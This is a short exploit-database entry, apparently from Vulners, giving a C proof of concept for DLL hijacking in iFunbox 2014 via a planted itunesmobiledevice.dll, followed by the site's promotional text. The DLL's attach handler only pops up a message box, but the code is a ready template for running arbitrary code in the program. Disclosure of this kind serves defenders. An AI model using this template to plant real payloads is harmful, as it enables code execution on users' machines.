`/*
* Exploit Title:iFunbox 2014 3.4.697.652 DLL Hijacking Exploit (itunesmobiledevice.dll)
* Date: 25/12/2014
* Author: Hadji Samir [email protected]
* Vendor Homepage: http://i-funbox.com/
*Soft link :http://dl.i-funbox.com/ifunbox2014_setup.exe
* Tested on: windows 7 fr
*/
#include <windows.h>
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int owned() {
MessageBox(0, "iFunbox DLL Hijacked\Hadji Samir", "POC", MB_OK);
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation